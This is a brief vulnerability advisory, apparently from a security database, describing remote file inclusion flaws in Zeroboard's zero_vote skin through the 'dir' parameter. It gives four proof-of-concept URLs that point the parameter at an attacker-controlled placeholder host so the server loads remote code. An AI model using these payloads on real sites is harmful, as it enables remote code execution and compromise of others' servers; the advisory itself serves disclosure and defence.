|
Zeroboard DIR Parameter Remote File Include Vulnerabilities
An exploit is not required. The following proof of concept examples are available: http://www.example.com/skin/zero_vote/error.php?dir=http://[ATTACKER] http://www.example.com/skin/zero_vote/login.php?dir=http://[attacker]/ http://www.example.com/skin/zero_vote/setup.php?dir=http://[attacker]/ http://www.example.com/skin/zero_vote/ask_password.php?dir=http://[attacker]/ |
|
|
Privacy Statement |